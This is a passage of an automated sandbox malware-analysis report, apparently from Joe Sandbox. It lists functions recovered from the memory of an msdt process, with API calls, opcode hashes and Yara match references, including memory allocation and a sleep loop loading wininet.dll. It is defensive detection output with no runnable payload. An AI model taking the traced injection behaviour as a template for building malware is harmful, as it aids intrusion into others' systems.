                                                                            Uniqueness Score: -1.00%

                                                                            Function 00098720, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 161 98720-98749 call 991f0 NtClose
                                                                            APIs
                                                                            • NtClose.NTDLL(`=,?,?,00093D60,00000000,FFFFFFFF), ref: 00098745
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: `=
                                                                            • API String ID: 3535843008-2762138152
                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction ID: 29cb77522676b964fd194517f3aa3ed4f146088acf8dd417925144a04461edcd
                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction Fuzzy Hash: 9FD01776200218ABDB10EB98CC89EE77BACEF48760F154499BA189B242C530FA0086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000987D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00098809
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: 9aeae7068cb3c7e3eec2614198bd98a9e5c4f939deac999703a2041c7f7e535f
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: DBF015B2200208ABCB14DF89CC81EEB77ADFF88750F118148BE0897242C630F810CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025F00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025F07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                            • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                            • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                            • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                            • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                            • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                            • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                            • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                            • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                            • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                            • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                            • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                            • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                            • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                            • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 025EFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                            • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                            • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                            • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00097310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 109 97310-9733f 110 9734b-97352 109->110 111 97346 call 9a030 109->111 112 97358-973a8 call 9a100 call 89b50 call 93e60 110->112 113 9742c-97432 110->113 111->110 120 973b0-973c1 Sleep 112->120 121 973c3-973c9 120->121 122 97426-9742a 120->122 123 973cb-973f1 call 96f40 121->123 124 973f3-97413 121->124 122->113 122->120 125 97419-9741c 123->125 124->125 126 97414 call 97140 124->126 125->122 126->125
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000007D0), ref: 000973B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: net.dll$wininet.dll
                                                                            • API String ID: 3472027048-1269752229
                                                                            • Opcode ID: 538abed265c5d158ddd0c2efc6e16d8eadf2debc70b5946eeebfa6a3d8b33158
